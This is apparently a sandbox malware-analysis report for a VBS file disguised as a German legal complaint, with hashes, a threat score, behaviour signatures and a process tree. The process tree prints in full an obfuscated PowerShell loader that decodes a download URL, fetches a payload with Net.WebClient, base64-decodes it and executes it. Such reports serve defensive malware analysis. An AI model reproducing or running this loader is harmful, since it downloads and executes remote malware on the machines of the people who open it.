Overview

overview

10

Static

static

1

08102024_1...lt.vbs

windows7-x64

8

08102024_1...lt.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08-10-2024 15:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    08102024_1541_Beschwerde-Rechtsanwalt.vbs

  • Size

    11KB

  • MD5

    a7f87588bc5a6ad03f79fa3085be9d28

  • SHA1

    c79dd84cd67b0846050b112ab4ce4b8c2f70794d

  • SHA256

    5700a6ed9522d53708f6e93c1303b25bcd9ede837dc6a5c62f929db1a8d4a59c

  • SHA512

    00dfd74685a88acb05970cfed07e5edbb605419f1ca4d8c0703ecb5dd436ef8b729c25bc5316e188d80c762a2f5b4a68a4b61b4dea8d7f1a50f477e76695bd21

  • SSDEEP

    192:RXVmQSH8ZNUYCxEXHnas8BK1gF8ylvACz74VT4DNIO+LtbA/ziLrRtEpDCBMjd/8:11SIxC+X91gZ/+pwz3wb

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08102024_1541_Beschwerde-Rechtsanwalt.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frigrelsens Unomnisciently Uninnocent Abaxial Incorporates Lycopin Tanda #>;$Misanthrope='Foyerernes';<#Bratticer Kalispel Supercapable Frembringelsernes Determinate #>;$Prayer=$host.PrivateData;If ($Prayer) {$cantino++;}function forladelsens($Envisagement213){$Spurveungen=$Langtidsindstillede+$Envisagement213.Length-$cantino;for( $Ligfrd86=2;$Ligfrd86 -lt $Spurveungen;$Ligfrd86+=3){$Dusts='Systematisk';$Fenestella+=$Envisagement213[$Ligfrd86];}$Fenestella;}function Tvangsapparat($Varyler){ & ($Hedas) ($Varyler);}$Awellimiden127=forladelsens 'geMAsoBrzPaiM,lB.lFuaTr/Ko5 D. S0Sc Af( W riMen ed.hoEnwAtsAm ExN TT T No1.e0 M. 0re; e FrWThi Bn 6St4Hy;.l FixUd6Pr4B ;ti .rudvSe:Bu1 e2De1,o.L,0Hj) D AkGAre ocU k,poK /Su2Eu0Nr1An0Gr0H,1 D0T 1.p BlFEli arAteSuf poEuxK,/ a1Be2 1La.K 0Ro ';$Landboreforms=forladelsens 'A uReSA EB rRe-I aI gSieOpnR t P ';$Cuticula=forladelsens 'Boh.utF,tElp.tsid:Me/st/tawN,w Rw R.K a uAbt oPrhGga .u sUn-Frc SnS .mad leEt/G oEllXedCh/ amAroAnbNaiGoli e i/ BP,drSie.ve nV sUn. FaFyaSmfCa ';$Ludder=forladelsens ' L>I ';$Hedas=forladelsens ',pISeeBixF ';$Underbegrebhs='Frags';$Haglbsserne='\Refleksbevgelsen.Owl';Tvangsapparat (forladelsens ' S$ Sg ol To.rbTaa olSk: lN me Nd SsF v BlKng feCerOn=En$TreEnnBevPa: ma RpRapSmdFoaHyt Va K+M $OmH uaFogDulB,b Hs es.ieGarDyn e ');Tvangsapparat (forladelsens 'Ic$TagDrl loKubGlaInlN,: SBB,rCre UpEniHanJudR.e UnGleKr=Ma$BiCSkuBet i ecBiuDilEka R. .sP p lCuiVatWa(Fr$KlL u Hd Bd KeAurSc) U ');Tvangsapparat (forladelsens 'Mu[D N BeGetPl. oSD.e,irRev Vi UcG eU.P o aiBanKat,eMJaaInn.aaPrg NeK r .] o: r:KbS eancTeuBjrIniRutKvy.ePDirPio FtXio cUno ClBo Tr= F Qu[WiN,peIltCh.SeSHye mcReuG r DiKotMyyFuPSkrCooNetTioSkc MoMyl MTBey.rp CeUn]il: :HaTA.l asO 1V 2P ');$Cuticula=$Brepindene[0];$oophorectomy=(forladelsens 'ho$UnG fLShoFlb GAFoL,t:s.G oe nOoi pNF d OKAfAJdl DdCuE e=NeNFoe iW -,uOPyBBrJ EKvCB,TAl ,rS,tY Cs PtCee M ,. Onbee,xtB .Ovw ePlbAkCBalOpi AElenSyTHy ');Tvangsapparat ($oophorectomy);Tvangsapparat (forladelsens 'O $ GPoemenAriHonildGakTraT l NdT.eta.GrHfie,taPodMae UrPosSt[Fe$VrLE aGan vdTebReo Cr,eeSpf ,o nrG,mU,sG.]S =hv$LeAThwSmePllPllini.am uiMidbee GnYd1Sa2re7Em ');$Astipulation=forladelsens 'Re$ UGUieThnTeiUnn edS.kUnaEdl edV.e A.GeDTro wB nH.lEpo MaHodTrFDaiDalVieOr(Vi$InCSkuOrt .isyc DuS l Sa,t, O$NaSIck.iiFln kn e,drLan.eeYo)Sy ';$Skinnerne=$Nedsvlger;Tvangsapparat (forladelsens 'e $,igA lG OVlB A bl ,:SuO TVPoetoR ONbieFeaWiTfo= p(C TCrEHes PTTj- IpLiA LtEgH o Ka$OcsBhK I kNClNB,e HrVanBaeBe)F, ');while (!$Overneat) {Tvangsapparat (forladelsens 'Dr$Dog Alsoo FbHeaAul.e:MoR,oe Ud MnSti anSigFas TkBuo UrAnp usSpe anAtepasRd= e$Dnt sr nuFoeCh ') ;Tvangsapparat $Astipulation;Tvangsapparat (forladelsens '.yST,tDraprrFatS.- AS ldievaeRupSe A4A ');Tvangsapparat (forladelsens 'Op$R gAxlBeoPabEla Ulin: SOK vBreC rdinT eBoavatka=Hi(FaTF,ekesDrt i-AnPU aAntMahba Fr$LiSmokP.i n RnRee,ir rnbae ) B ') ;Tvangsapparat (forladelsens 'Sc$ ,gHil.eo.hburaLnl C: ILTeeU t hmBae itSaaFul l Serer osDu=Vi$PigSll ao Lb a l,a: TOBem NkKal ,aL.sCosPhiGofP,iNicSveGrrIliEpnSug AeBerN,sDe+Su+,o%Ad$A.BS,rCleExp niU,n GdSteOsnEbe a.LecDyo Ru mn.etS ') ;$Cuticula=$Brepindene[$Letmetallers];}$Filmundergrund60=350404;$Rysteturenes=28134;Tvangsapparat (forladelsens 'W $O gC.lFoo ib.yaoblk : SS UkBioSnv,asIn2 U7 l U =.r ,rGcoe AtFj-,vCA o onCetSke nBrt p Gr$ kSCokPoiThn Zn,ae ArElnF,eCa ');Tvangsapparat (forladelsens 'Va$KugKalOvoD bT aRelU : aJ ,u arPe K=Av B [S SSty FsLotlie.emU,. rCafoPonD vSpeElrGetUn]Em:to:SuFd rEvo SmSiBCoaNasP.eAf6 O4hjSAptB r iM nPag N(Un$ZiSE kVio vT.sHu2Sn7 C)Pa ');Tvangsapparat (forladelsens 'A $F.gmolProG.bG.aLal f:SeC h ou nfTrfByiImeD,rBi Hj=Su .l[AcSM.yeksY,t veOpm T.PyT,ee Rx ct T.VoEt,nToc.no dCli Gn rgme]Pa:Ha:,bA KSI CNoIGaIRh.RiGMeeTrt KSAntSkrEgiK nPig C(Bo$OuJ uStrAd)P, ');Tvangsapparat (forladelsens 'Sm$Beg alH,oKnbDuaHel U:FeL UeAmg,ri kssklAna tByoExr F1 h5,r3Do= b$EkCHehCeuU fN fExiUneForFr.R.sTruPab.isDetSir eitin.igRi(K $ LFSiiSal .mTeu .nPrdCoeEfrBrgTyrBeu Fn dEu6Ap0 ,Fo$UdRFoy bs ot ,eF t UuCorS eUnndae Ss o),r ');Tvangsapparat $Legislator153;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2484

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabC093.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • memory/2484-20-0x000007FEF65EE000-0x000007FEF65EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2484-21-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2484-22-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2484-23-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2484-24-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2484-26-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2484-25-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2484-27-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2484-28-0x000007FEF65EE000-0x000007FEF65EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2484-29-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2484-30-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download